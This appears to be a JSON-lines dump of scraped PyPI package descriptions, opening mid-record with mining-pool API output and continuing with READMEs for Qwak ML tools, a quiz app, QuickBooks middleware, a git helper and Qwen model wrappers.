\"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:03:10\",\n \"txid\": null,\n \"amount\": 0.1,\n \"confirmations\": null,\n \"height\": null,\n \"type\": \"TXFee\",\n \"id\": 898450\n }\n ]\n },\n \"runtime\": 1032.723903656\n }\n}User sharerate:>>> qwak.user_sharerate()\n{\n \"getusersharerate\": {\n \"version\": \"1.0.0\",\n \"data\": \"1.42\",\n \"runtime\": 1.2180805206299\n }\n}User transactions:>>> qwak.user_transactions()\n{\n \"getusertransactions\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"transactionsummary\": {\n \"Fee\": 482.61430904998,\n \"TXFee\": 238.79999999999,\n \"Credit\": 115545.00010462,\n \"Donation\": 43.14081271,\n \"Debit_AP\": 96526.28776731,\n \"Debit_MP\": 16190.69451484\n },\n \"transactions\": [\n {\n \"username\": \"unick\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.00382566,\n \"confirmations\": 13,\n \"height\": 817836,\n \"type\": \"Fee\",\n \"id\": 898454\n },\n {\n \"username\": \"unick\",\n 
\"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.76513133,\n \"confirmations\": 13,\n \"height\": 817836,\n \"type\": \"Credit\",\n \"id\": 898453\n },\n {\n \"username\": \"zelszels\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.00023474,\n \"confirmations\": 13,\n \"height\": 817836,\n \"type\": \"Fee\",\n \"id\": 898452\n },\n {\n \"username\": \"zelszels\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.04694836,\n \"confirmations\": 13,\n \"height\": 817836,\n \"type\": \"Credit\",\n \"id\": 898451\n },\n {\n \"username\": \"interfuse\",\n \"blockhash\": null,\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:03:10\",\n \"txid\": null,\n \"amount\": 0.1,\n \"confirmations\": null,\n \"height\": null,\n \"type\": \"TXFee\",\n \"id\": 898450\n }\n ]\n },\n \"runtime\": 1028.6419391632\n }\n}User workers:>>> qwak.user_workers()\n{\n \"getuserworkers\": {\n \"version\": \"1.0.0\",\n \"data\": [\n {\n \"username\": \"username.5870x2\",\n \"monitor\": 0,\n \"count_all_archive\": 7,\n \"difficulty\": 128,\n \"count_all\": 107,\n \"password\": \"x\",\n \"id\": 41,\n \"hashrate\": 797\n },\n {\n \"username\": \"username.6970\",\n \"monitor\": 0,\n \"count_all_archive\": 1,\n \"difficulty\": 128,\n \"count_all\": 63,\n \"password\": \"x\",\n \"id\": 43,\n \"hashrate\": 447\n },\n {\n \"username\": \"username.2k\",\n \"monitor\": 0,\n \"count_all_archive\": 0,\n \"difficulty\": 0,\n \"count_all\": 0,\n \"password\": \"x\",\n \"id\": 970,\n \"hashrate\": 0\n },\n {\n \"username\": \"username.6850\",\n \"monitor\": 0,\n \"count_all_archive\": 3,\n \"difficulty\": 128,\n \"count_all\": 21,\n \"password\": \"x\",\n \"id\": 980,\n \"hashrate\": 168\n },\n {\n \"username\": \"username.2k2\",\n \"monitor\": 0,\n \"count_all_archive\": 23,\n \"difficulty\": 128,\n \"count_all\": 287,\n \"password\": \"x\",\n \"id\": 1062,\n \"hashrate\": 2167\n },\n {\n \"username\": \"username.2\",\n \"monitor\": 0,\n \"count_all_archive\": 31,\n \"difficulty\": 128,\n \"count_all\": 261,\n \"password\": \"x\",\n \"id\": 1078,\n \"hashrate\": 2042\n }\n ],\n \"runtime\": 23.391008377075\n }\n}Dashboard:>>> qwak.user_dashboard()\n{\n \"getdashboarddata\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"personal\": {\n \"sharedifficulty\": 0,\n \"sharerate\": 0,\n \"estimates\": {\n \"payout\": 0,\n \"donation\": 0,\n \"fee\": 0,\n \"block\": 0\n },\n \"shares\": {\n \"invalid_percent\": 0,\n \"unpaid\": 0,\n \"valid\": 0,\n \"invalid\": 0\n },\n \"hashrate\": 0\n },\n \"raw\": {\n \"personal\": {\n \"hashrate\": 0\n },\n \"network\": {\n \"nextdifficulty\": 3.96825133,\n \"esttimeperblock\": 76.040271480616,\n \"blocksuntildiffchange\": 1,\n \"hashrate\": 621.58896191\n },\n \"pool\": {\n \"hashrate\": 47074\n }\n },\n \"system\": {\n \"load\": [\n 1.35,\n 1.21,\n 1.17\n ]\n },\n \"pool\": {\n \"info\": {\n \"currency\": \"HBN\",\n \"name\": \"Scrypt.io | HBN Pool\"\n },\n \"workers\": 35,\n \"shares\": {\n \"invalid_percent\": 1.35,\n \"progress\": 1.1,\n \"valid\": 3403,\n \"estimated\": 13139,\n \"invalid\": 690\n },\n \"difficulty\": 16,\n \"target_bits\": 20,\n \"price\": \"0.00043614\",\n 
\"hashrate\": 0.723849\n },\n \"network\": {\n \"blocksuntildiffchange\": 1,\n \"esttimeperblock\": 76.04,\n \"difficulty\": 12.83067929,\n \"hashrate\": 51.144842457,\n \"nextdifficulty\": 3.96825133,\n \"block\": 208173\n }\n },\n \"runtime\": 55.642127990723\n }\n}User navbar:>>> qwak.user_navbar()\n{\n \"getnavbardata\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"raw\": {\n \"workers\": 30,\n \"pool\": {\n \"hashrate\": 47074\n }\n },\n \"network\": {\n \"difficulty\": 13.02524623,\n \"block\": 817867,\n \"hashrate\": 621.58896191\n },\n \"pool\": {\n \"progress\": 81.43,\n \"workers\": 30,\n \"estimated\": 13338,\n \"hashrate\": 47074\n }\n },\n \"runtime\": 14.021873474121\n }\n}License:Apache v2.0 License\nCopyright 2014 Martin Simon\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.Buy me a coffee?If you feel like buying me a coffee (or a beer?), donations are welcome:WDC : WbcWJzVD8yXt3yLnnkCZtwQo4YgSUdELkj\nHBN : F2Zs4igv8r4oJJzh4sh4bGmeqoUxLQHPki\nDOGE: DRBkryyau5CMxpBzVmrBAjK6dVdMZSBsuS"} +{"package": "qwak-core", "pacakge-description": "Qwak CoreQwak is an end-to-end production ML platform designed to allow data scientists to build, deploy, and monitor their models in production with minimal engineering friction.\nQwak Core contains all the objects and tools necessary to use the Qwak Platform"} +{"package": "qwak-inference", "pacakge-description": "Qwak InferenceQwak is an end-to-end production ML platform designed to allow data scientists to build, deploy, and monitor their models in production with minimal engineering friction.\nQwak Inference contains tools that allow predicting against the Qwak Platform"} +{"package": "qwak-sdk", "pacakge-description": "Qwak SDKQwak is an end-to-end production ML platform designed to allow data scientists to build, deploy, and monitor their models in production with minimal engineering friction."} +{"package": "qwak-sim", "pacakge-description": "QWAKQuantum Walk Analysis Kit - A Python package for continuous-time quantum walk (CTQW) simulation.Additionally, a fullstack web app built with Flask and PyMongo is available onHeroku.Table of Contents:FundingInstallationUsageDocumentationContributingFundingThis work is financed by National Funds through the Portuguese funding agency, FCT - Funda\u00e7\u00e3o para a Ci\u00eancia e a Tecnologia, within project UIDB/50014/2020.InstallationYou can install the package both through PyPipip install qwak-simor locally, by cloning the project, installing the requirements via pip followed bypip install .in the cloned folder. 
A virtual environment is highly recommended.DependenciesNumpyScipySympymatplotlibnetworkxQuTipeelStep-by-step installation instructions can be found in the documentationinstallationpage.UsageA basic plot of the probability distribution for a CTQW with a walker starting in a superposition of central positions, in a cyclic graph, can be achieved via the following example:importnetworkxasnximportmatplotlib.pyplotaspltfromqwak.qwakimportQWAKn=100t=12initState=[n//2,n//2+1]graph=nx.cycle_graph(n)qwak=QWAK(graph)qwak.runWalk(t,initState)probVec=qwak.getProbVec()plt.plot(probVec)plt.show()Further examples exploring all the different components will be available once theusagedocumentation is complete.DocumentationDocumentation is a work in progress, and can be found in thispage.ContributingExtra requirementsautopep8pytestsphinxContributing to the package follows a relatively simple workflow. After performing the necessary setup procedures,\nyou will update your fork with the latest version of the QWAK project. You can now perform your changes, format\nthem and test them. If a new feature is added, you will need to add docstrings to the new methods and update the\nexisting documentation accordingly. If your contribution is directly to the documentation, you will follow a similar procedure.Step-by-step instructions on how to setup all the required components for organized contribution can be found\non thecontributingdocumentation page."} +{"package": "qwant", "pacakge-description": "#My qwant toolbox\n\nQwant is search context-independet and non-spying engine\n* Better for e-commerce search than Google\n* Free. Using on industrial scale\nrequires proxy that is way cheeper than google\n* Available for multithreading\n* Context-independet, that means a consistent output for you queries\n\nimport qwant\n\nqwant.search(\"Barbie doll\") \n\n#get only items of search. 10 by default\nqwant.items(\"Barbie doll\")\n\n#but you can get more. It's done with multiple requests\nqwant.items(\"Barbie doll\",count=100)\n\n#you can set web site of search\nqwant.items(\"site:allegro.pl/oferta/ Barbie doll\")\n\n#add your proxy\nsession={}\nqwant.items(\"site:allegro.pl/oferta/ Barbie doll\",session=session)\n\n#you can use luminati so EVERY request would be done from different IP\nimport luminati\nsession = luminati.session(\"\", \"\")\nqwant.items(\"site:allegro.pl/oferta/ Illuminati doll\",session=session)"} +{"package": "qwantz-metadata", "pacakge-description": "Dinosaur Comic Metadata ProcessorA set of tools for collecting variousRyan North'sDinosaur Comicsmetadata and compiling them into one JSON document.It uses transcripts obtained using my other project,https://github.com/janek37/parse_qwantz.InstallationInstallqwantz-metadatawithpippipinstallqwantz-metadataUsageYou need three directories: one containing the comic transcripts, one containing the footer transcripts, and one containing raw HTML files.The transcripts and footers are required to be plain text files with filenames like - .txt, e.g.0001 - comic2-02.png.txt.The filenames of the HTML files are not relevant.Once the directories are ready, runqwantz-metadatato print the combined metadata JSON document to the standard output:$ qwantz-metadata > output.jsonAcknowledgmentsThis program would not be possible without the wonderful comics by Ryan North!"} +{"package": "qwark", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qwasm", "pacakge-description": "No description available on PyPI."} +{"package": "qwazzock", "pacakge-description": "qwazzockAn app for hosting quizes remotely.Installingpip install qwazzockUsageStart an instance of the app using:qwazzockCreate a route to localhost:5000 using a hostname included in the SSL certificate.Instruct players to navigate to the site's root address (e.g.http://127.0.0.1:5000). They can then enter their name, team name and buzz when they know the answer. Note that players to be on the same team, their team names must match exactly (including case).As a host, you can then navigate to the/hostpath (e.g.http://127.0.0.1:5000/host) in order to see who has buzzed first and to mark their answer. You can respond with the following:passcan be used when no one wants to buzz in who still can, as they don't know the answer. It clears the hotseat if occupied (e.g if someone buzzed accidentally), and any locked out teams become unlocked.rightclears the hotseat, any locked out teams and awards the team a point.wrongplaces the team who answered onto a \"locked out\" list, preventing them from buzzing in until the current question completed.You can also useresetto wipe all data for the in progress game and start a new one.Clicking on the team's button will lock out that team until the end of the round. This can be useful for managing elimitator rounds and the like.Question TypesThere are two \"question types\" you can select,standardorpicture.StandardThis is the default question type. It allows you to ask any question and decide if the answer is right or wrong.PictureWhen this quesiton type is selected, all players are presnted with a randomly selected image from thequestionsfolder in the content directory (see below) as their buzzer image. You will be presented with the name of the image they are seeing.The ordering of the images is random. Once you selectpass,rightorwrong, the next image in the list will be presented. This will continue until you change question type, or you run out of question images. If the latter occurs, the question type will automatically revery back tostandard.Should you not provide a content directory, the content directory does not contain aquestionsfolder, or thequestionsfolder is empty, then the question type will automatically revert back tostandard.Environment variablesBehaviour of the application can be tweaked by setting the following environment variables:NameOptionsDefaultDescriptionQWAZZOCK_CONTENT_PATHA valid absolute path.Not setIf set, additional content is loaded into qwazzock from this directory.QWAZZOCK_LOG_LEVELDEBUG,INFO,WARNING,ERRORINFOLog application events at this level and above.QWAZZOCK_SOCKETIO_DEBUG_MODEAnyNot setIf set, access logs from socketio will be output.Content DirectoryFor a more interactive experience, you can load custom content into a \"content directory\" and provide this to qwazzock using theQWAZZOCK_CONTENT_PATHenvironment variable.Currently, the only supported custom content is images for use with thepicturequestion type. These must be loaded into aquestionsfolder within the content directory. 
The file name should be the answer as you wish it to appear to the host.DevelopmentInitialise development environmentmake initStandup a local dev servermake devThe server will be accessible athttps://127.0.0.1:5000.Run all testsmake testThis includes:unit tests (make unit_test).static code analysis (make bandit).dependency vulnerability analysis (make safety).Build artefactsmake buildThis includes:pip wheel (make build_wheel).docker image (make build_image).Standup a local containermake runStop local containersmake stopRelease versionTag the repository with the project version and publish the distributables toPyPI.Local repo must be clean.poetry config pypi-token.pypi ${your-pypi-token}\nmake release"} +{"package": "qwb_nester", "pacakge-description": "UNKNOWN"} +{"package": "qwc", "pacakge-description": "qwc-middlewareSOAP service for connecting to QuickBooks webconnector.Built using the framework built by Bill Barry in:https://github.com/BillBarry/pyqwcUpdated for use with python3, WebConnector version 2.3.0.207, and rapid proto-typing of\ndifferent QuickBooks objects.Useageqwc is a soap server with built in client that uses redis to queue raw QBXML to be processed\nby the QuickBooks WebConnector. This is an asynchronous process that requires the client to listen\nfor when work has been completed by the QBWC.[client] >> sends qbxml >> [redis][QBWC] >> checks redis for new tickets >> [redis][redis] >> sends qbxml via ticket >> [QBWC][QBWC] >> process ticket and returns reslt/error >> [redis][client] >> query or subscribe to redis for result >> [redis]Install the package in a fresh environment:python -m venv .venvthen in install the package with pip:python -m pip install qwcOr get the latest development version from github:python -m pip install git+https::/github.com/bill-ash/qwc-middlewareIf noconfig.inifile is found in the local directory, the default included with the package will be\nused:[qwc]\nqbwfilename = ''\n\nusername = 'qbwcuser'\n# Password entered when install the .qwc file to QuickBooks WebConnector.\npassword = 'test'\nhost = 'localhost'\nport = 4244\n\n[redis]\nhost = '127.0.0.1'\nport = 6379\npassword = ''\ndb = 0Install thepyqwc.qwcfile to the QuickBooks WebConnector by opening the WebConnector,File >> AppManagement >> Update Web Servicesand choosepyqwc.qwc. 
The default password istest.Start the service with:python -m qwc.scripts.start_serverThen, in a new terminal start a new session adding commands to be executed with the client.qwcClient = QBWCClient()\n\nreqXML = add_customer('SuperCustomer123')\n\n# Send the request to Redis to be processed by QuickBooks WebConnector \nqwcClient.sendxml(reqXML)Check the examples directory for additional information.Once new work has been delivered to the Redis queue, run an update from the QuickBooks WebConnector\nto execute the pending work to be performed.Sample .qwc fileBelow is a sample .qwc file to be installed to the QuickBooks WebConnector:\n\n QWCTestService\n \n http://localhost:4244/qwc/\n Python access to Quickbooks\n http://localhost:4244/\n qbwcuser\n {6801a7d2-3fb4-4643-8ef0-5e702b99521e}\n }495b6884-e33f-4dba-9ecc-a3bbad96a971}\n QBFS\n \n 60\n \nSave this file with a.qwcextension to successfully install to the WebConnector.Examplefrom qwc.client import QBWCClient\nfrom qwc.objects import add_customer\nfrom qwc.service import start_server\n\n# Create the QBXML\ncustomer = add_customer(name='BillAsh123')\n\n# Start a new client \nclient = QBWCClient()\n\n# Deliver the QBXML to redis to be processed \nclient.sendxml(customer)\n\n# Start the server and then update the installed service from QuickBooks WebConnector\nstart_server()"} +{"package": "qwcore", "pacakge-description": "Core utils forqwcodeprojects."} +{"package": "qwc-services-core", "pacakge-description": "Shared modules for QWC services."} +{"package": "qwd", "pacakge-description": "Makegit rev-list --count HEADeasy to type by just calling itqwd q.Safe commandstypeto doqwd qgit rev-list --count HEADqwd qwgit branchqwd wgit log -3qwd wdgit diff --cachedDestructive commandsEach destructive command prompts confirmation before execution.typeto dotranslationqwd qwdgit add .\u2192git status\u2192git commit -m \"\"I made some changes, but I don't remember what I did. 
Create a commit for me.qwd qwdgit status\u2192git checkout main\u2192git pullInstallingvia PyPI, runpip install qwd."} +{"package": "qwdeploy", "pacakge-description": "Core utils for Defining and Deploying StacksDocs:http://qwdeploy.readthedocs.org/en/latest/"} +{"package": "qweatherPyAPI", "pacakge-description": "QWeather APIoho ~, find me here:https://github.com/shaun17/qweather-api.git"} +{"package": "qwebtip", "pacakge-description": "A Qt package that lets you use web URLs as tooltips in Qt widgets.Free software: BSD 2-Clause LicenseRequiresPySide or PyQt4 with QtWebKit included.Installationpip install qwebtipHow To UseImport qwebtip's main module,qweburltipand set it to override one of\nyour widget's tooltips with some URL.The next time you build your application and hover over that widget, a URL box\nis displayed with that URL, instead.fromqwebtipimportqweburltipurl='http://pyqt.sourceforge.net/Docs/PyQt4/qwebframe.html'qweburltip.override_tool_tip(QtWidgets.QLabel('Some label'),url)How To Use - CustomizingSetting a custom tooltip sizefromqwebtipimportqweburltipurl='http://pyqt.sourceforge.net/Docs/PyQt4/qwebframe.html'qweburltip.override_tool_tip(QtWidgets.QLabel('Some label'),url,width=100,height=400,)Opening the URL at a specific header sectionurl='http://pyqt.sourceforge.net/Docs/PyQt4/qwebframe.html'qweburltip.override_tool_tip(self.line_edit,element_selector.UnknownHeaderSelector(url,'Method Documentation',),)Disabling CachingLoaded webpages are cached so that successive loads can be kept fast.\nTo disable caching, set this environment variable.exportQWEBTIP_DISABLE_CACHING=1This is useful for debugging but is not recommended.Changelog0.2.0 (2019-06-02)Reformatted the code to use [black](https://github.com/python/black)0.1.0 (2018-12-04)First release on PyPI."} +{"package": "qwelog", "pacakge-description": "The simple personal logger that is so easy, you'll use it."} +{"package": "qwen", "pacakge-description": "Qwen-VLMy personal implementation of the model from \"Qwen-VL: A Frontier Large Vision-Language Model with Versatile Abilities\", they haven't released model code yet sooo...\nFor more details, please refer to thefull paper.Installpip3 install qwenUsage# Importing the necessary librariesimporttorchfromqwenimportQwen# Creating an instance of the Qwen modelmodel=Qwen()# Generating random text and image tensorstext=torch.randint(0,20000,(1,1024))img=torch.randn(1,3,256,256)# Passing the image and text tensors through the modelout=model(img,text)# (1, 1024, 20000)TodoPosition aware vision language adapter, compresses image features. Single layer cross attention module inited randomly => group of trainable embeddings as query vectors + image features from the visual encoder as keys for cross attention ops => OUTPUT: compresses visual feature sequence to a fixed length of 256, 2d absolute positional encodings are integrated into the cross attention mechanism's query-key pairs => compressed feature sequence of length 256 => fed into the decoder LLM.Bounding Boxes, for any given accurate bounding box, a normalization process is applied in the range [0, 1000] and transformed into a string format (Xtopleft, Ytopleft)(Xbottomright, Ybottomright) -> the string is tokenized as text and does not require positional vocabulary. Detection strings and regular text strings, two special tokens and are added to the beginning and end of the bounding box string. 
+ another sed of special tokens ( and ) is introduced.CitationsPlease use the following to cite this work:@article{bai2023qwen,title={Qwen-VL: A Frontier Large Vision-Language Model with Versatile Abilities},author={Bai, Jinze and Bai, Shuai and Yang, Shusheng and Wang, Shijie and Tan, Sinan and Wang, Peng and Lin, Junyang and Zhou, Chang and Zhou, Jingren},journal={arXiv preprint arXiv:2308.12966},year={2023},url={https://doi.org/10.48550/arXiv.2308.12966}}"} +{"package": "qwen7b-tr", "pacakge-description": "qwen7b-trTranslate/Chat using a qwen-7b-chat API at huggingfaceInstall itpipinstallqwen7b-tr--upgrade# pip install git+https://github.com/ffreemt/qwen7b-tr# poetry add git+https://github.com/ffreemt/qwen7b-tr# git clone https://github.com/ffreemt/qwen7b-tr && cd qwen7b-trUse itfromqwen7b_tr.__main__importqwen7b_tr# This is in fact just chat with the qwen-7b-chat modelprint(qwen7b_tr(\"\u4f60\u597d\"))# \u4f60\u597d\uff01\u6709\u4ec0\u4e48\u6211\u80fd\u5e2e\u52a9\u4f60\u7684\u5417\uff1fFrom command linepython -m qwen7b_tr test abc\n# or qwen7b-tr test abc\u4e09\u4e2a\u7248\u672c\u5982\u4e0b\uff1a1.\u6d4b\u8bd5abc2.ABC\u6d4b\u8bd53.\u4e09\u53f7\u6d4b\u8bd5ABCIf no text is provided, the content of the clipboard will be used.python -m qwen7b_tr# Assume the clipboard contains `available`Notextprovided,translatingthecontentoftheclipboard...diggin...\nLoadedasAPI:https://mikeee-qwen-7b-chat.hf.space/\u2714\n\navailable\n\n\u4ee5\u4e0b\u662f\u4e09\u4e2a\u4e0d\u540c\u7684\u4e2d\u6587\u7248\u672c\uff1a1.\u53ef\u7528\u76842.\u53ef\u83b7\u5f97\u76843.\u6709\u6548\u7684Target language can be specified with -tpython -m qwen7b_tr -t \u5fb7\u8bedNo text provided, translating the content of the clipboard...\n diggin...\nLoaded as API: https://mikeee-qwen-7b-chat.hf.space/ \u2714\n\navailable\n\n1. \"Verf\u00fcgbare\"\n 2. \"Sollte\"\n 3. \"Da ist\"python -m qwen7b_tr -t \u82f1\u8bed \u6211\u56fd\u670d\u52a1\u8d38\u6613\u201c\u670b\u53cb\u5708\u201d\u65e5\u76ca\u6269\u5927\n diggin...\nLoaded as API: https://mikeee-qwen-7b-chat.hf.space/ \u2714\n\n\u6211\u56fd\u670d\u52a1\u8d38\u6613\u201c\u670b\u53cb\u5708\u201d\u65e5\u76ca\u6269\u5927\n\n1. China's circle of service trade friends is expanding.\n 2. The circle of China's service trade partners is growing larger.\n 3. China's circle of service trade acquaintances is increasing.Help and Manualpython -m qwen7b_tr --help\n\n# or\nqwen7b-tr --helpUsage:python-mqwen7b_tr[OPTIONS][QUESTION]...Translateviaqwen-7b-chathuggingfaceAPI.\n\nArguments:[QUESTION]...Sourcetextorquestion.\n\nOptions:-c,--clipbUseclipboardcontentifsetorif`question`isempty.-t,--to-langTEXTTargetlanguagewhenusingthedefaultprompt.[default:\u4e2d\u6587]-n,--numbINTEGERnumberoftranslationvariantswhenusingthedefaultprompt.[default3]-m,--max-new-tokensINTEGERMaxnewtokens.[default:256]--temperature,--tempINTEGERTemperature.[default:0.81]--repetition-penalty,--repFLOATRepetitionpenalty.[default:1.1]--top-k,--top_kINTEGERTop_k.[default:0]--top-p,--top_pFLOATTop_p.[default:0.9]--user-promptTEXTUserprompt.[default:'\u7ffb\u6210\u4e2d\u6587\uff0c\u5217\u51fa3\u4e2a\u7248\u672c.']-p,--system-promptTEXTUserdefinedsystemprompt.[default:'Youare a helpful assistant.']-v,-V,--versionShowversioninfoandexit.--helpShowthismessageandexit.More Examplestemperature# default temperature 0.81\npython -m qwen7b_tr marketing is critical to ensure fan interest remains high\n\n1. \u8425\u9500\u5bf9\u4e8e\u786e\u4fdd\u7c89\u4e1d\u7684\u5174\u8da3\u4fdd\u6301\u9ad8\u6c34\u5e73\u81f3\u5173\u91cd\u8981\u3002\n2. 
\u5e02\u573a\u8425\u9500\u5bf9\u4e8e\u7ef4\u6301\u7c89\u4e1d\u7684\u5174\u8da3\u81f3\u5173\u91cd\u8981\u3002\n3. \u7c89\u4e1d\u7684\u5174\u8da3\u6c34\u5e73\u9700\u8981\u901a\u8fc7\u6709\u6548\u7684\u5e02\u573a\u8425\u9500\u6765\u4fdd\u6301\u3002# a high temperature reuslts in a versatile outcome\npython -m qwen7b_tr --temp 1.1 marketing is critical to ensure fan interest remains high\n\n1. \u8425\u9500\u81f3\u5173\u91cd\u8981\uff0c\u4ee5\u786e\u4fdd\u7403\u8ff7\u7684\u5174\u8da3\u7ee7\u7eed\u4fdd\u6301\u9ad8\u6c34\u5e73\u3002\n2. \u8425\u9500\u5de5\u4f5c\u662f\u81f3\u5173\u91cd\u8981\u7684\uff0c\u4ee5\u4fdd\u6301\u7403\u8ff7\u7684\u5174\u8da3\u3002\n3. \u63a8\u5e7f\u662f\u4fdd\u6301\u7403\u8ff7\u5173\u6ce8\u5ea6\u7684\u5173\u952e\u3002A very high temperature (for example 1.5) may result in some nonsensical output.-n: number of translation variantsIf you wish to have more choices, for example 5 variantspython -m qwen7b_tr -n 5 marketing campaign companion\n\n 1. \u8425\u9500\u6d3b\u52a8\u4f19\u4f34\n 2. \u5e02\u573a\u8425\u9500\u6d3b\u52a8\u4f34\u4fa3\n 3. \u8425\u9500\u6d3b\u52a8\u52a9\u624b\n 4. \u5e02\u573a\u8425\u9500\u6d3b\u52a8\u652f\u6301\u8005\n 5. \u8425\u9500\u6d3b\u52a8\u534f\u4f5c\u8005max new tokensThe defaultmax_new_tokensis 256, sutiable for chatting. If you translate a large chunk of text. you may wish to setmax_new_tokensto 1024.python -m qwen7b_tr --max-new-tokens 1024 blah blah ...Develop and Debugset LOGURU_LEVEL=TRACE\n\n# or in linux\nexport LOGURU_LEVEL=TRACEto see a lot of debug messages"} +{"package": "qwen-cpp", "pacakge-description": "qwen.cppC++ implementation ofQwen-LMfor real-time chatting on your MacBook.FeaturesHighlights:Pure C++ implementation based onggml, working in the same way asllama.cpp.Pure C++ tiktoken implementation.Streaming generation with typewriter effect.Python binding.Support Matrix:Hardwares: x86/arm CPU, NVIDIA GPUPlatforms: Linux, MacOSModels:Qwen-LMGetting StartedPreparationClone the qwen.cpp repository into your local machine:gitclone--recursivehttps://github.com/QwenLM/qwen.cpp&&cdqwen.cppIf you forgot the--recursiveflag when cloning the repository, run the following command in theqwen.cppfolder:gitsubmoduleupdate--init--recursiveDownload the qwen.tiktoken file fromHugging Faceormodelscope.Quantize ModelUseconvert.pyto transform Qwen-LM into quantized GGML format. For example, to convert the fp16 original model to q4_0 (quantized int4) GGML model, run:python3qwen_cpp/convert.py-iQwen/Qwen-7B-Chat-tq4_0-oqwen7b-ggml.binThe original model (-i ) can be a HuggingFace model name or a local path to your pre-downloaded model. 
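To make the "-t q4_0" choice above more concrete, here is a rough, self-contained sketch of symmetric 4-bit block quantization with per-block fp16 scales. It is only an illustration of the idea, not the actual ggml q4_0 byte layout; the block size of 32 and the helper names are assumptions made for the example.

```python
import numpy as np

def quantize_q4_sketch(weights: np.ndarray, block_size: int = 32):
    """Toy symmetric 4-bit quantization: each block keeps one fp16 scale
    plus integer codes in [-8, 7]. Illustrative only, not ggml's format."""
    blocks = weights.reshape(-1, block_size)
    scales = np.abs(blocks).max(axis=1, keepdims=True) / 7.0
    scales[scales == 0] = 1.0                      # avoid dividing by zero
    codes = np.clip(np.round(blocks / scales), -8, 7).astype(np.int8)
    return codes, scales.astype(np.float16)

def dequantize_sketch(codes: np.ndarray, scales: np.ndarray) -> np.ndarray:
    # Reconstruct approximate fp32 weights from codes and per-block scales.
    return (codes.astype(np.float32) * scales.astype(np.float32)).ravel()

w = np.random.randn(4096).astype(np.float32)
codes, scales = quantize_q4_sketch(w)
w_hat = dequantize_sketch(codes, scales)
print("max abs reconstruction error:", np.abs(w - w_hat).max())
```

The point is simply that most of the storage goes to the 4-bit codes while a small number of fp16 scales preserve each block's dynamic range, which is why 4-bit quantized model files are several times smaller than the fp16 original.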
Currently supported models are:Qwen-7B:Qwen/Qwen-7B-ChatQwen-14B:Qwen/Qwen-14B-ChatYou are free to try any of the below quantization types by specifying-t :q4_0: 4-bit integer quantization with fp16 scales.q4_1: 4-bit integer quantization with fp16 scales and minimum values.q5_0: 5-bit integer quantization with fp16 scales.q5_1: 5-bit integer quantization with fp16 scales and minimum values.q8_0: 8-bit integer quantization with fp16 scales.f16: half precision floating point weights without quantization.f32: single precision floating point weights without quantization.Build & RunCompile the project using CMake:cmake-Bbuild\ncmake--buildbuild-j--configReleaseNow you may chat with the quantized Qwen-7B-Chat model by running:./build/bin/main-mqwen7b-ggml.bin--tiktokenQwen-7B-Chat/qwen.tiktoken-p\u4f60\u597d# \u4f60\u597d\uff01\u5f88\u9ad8\u5174\u4e3a\u4f60\u63d0\u4f9b\u5e2e\u52a9\u3002To run the model in interactive mode, add the-iflag. For example:./build/bin/main-mqwen7b-ggml.bin--tiktokenQwen-7B-Chat/qwen.tiktoken-iIn interactive mode, your chat history will serve as the context for the next-round conversation.Run./build/bin/main -hto explore more options!Using BLASOpenBLASOpenBLAS provides acceleration on CPU. Add the CMake flag-DGGML_OPENBLAS=ONto enable it.cmake-Bbuild-DGGML_OPENBLAS=ON&&cmake--buildbuild-jcuBLAScuBLAS uses NVIDIA GPU to accelerate BLAS. Add the CMake flag-DGGML_CUBLAS=ONto enable it.cmake-Bbuild-DGGML_CUBLAS=ON&&cmake--buildbuild-jMetalMPS (Metal Performance Shaders) allows computation to run on powerful Apple Silicon GPU. Add the CMake flag-DGGML_METAL=ONto enable it.cmake-Bbuild-DGGML_METAL=ON&&cmake--buildbuild-jPython BindingThe Python binding provides high-levelchatandstream_chatinterface similar to the original Hugging Face Qwen-7B.InstallationInstall from PyPI (recommended): will trigger compilation on your platform.pipinstall-Uqwen-cppYou may also install from source.# install from the latest source hosted on GitHubpipinstallgit+https://github.com/QwenLM/qwen.cpp.git@master# or install from your local source after git cloning the repopipinstall.tiktoken.cppWe provide pure C++ tiktoken implementation. After installation, the usage is the same as openai tiktoken:importtiktoken_cppastiktokenenc=tiktoken.get_encoding(\"cl100k_base\")assertenc.decode(enc.encode(\"hello world\"))==\"hello world\"BenchmarkThe speed of tiktoken.cpp is on par with openai tiktoken:cdtestsRAYON_NUM_THREADS=1pythonbenchmark.pyDevelopmentUnit TestTo perform unit tests, add this CMake flag-DQWEN_ENABLE_TESTING=ONto enable testing. Recompile and run the unit test (including benchmark).mkdir-pbuild&&cdbuild\ncmake..-DQWEN_ENABLE_TESTING=ON&&make-j\n./bin/qwen_testLintTo format the code, runmake lintinside thebuildfolder. You should haveclang-format,blackandisortpre-installed.AcknowledgementsThis project is greatly inspired byllama.cpp,chatglm.cpp,ggml,tiktoken,tokenizer,cpp-base64,re2andunordered_dense."} +{"package": "qwer", "pacakge-description": "UNKNOWN"} +{"package": "qwerasd", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qwer-python", "pacakge-description": "No description available on 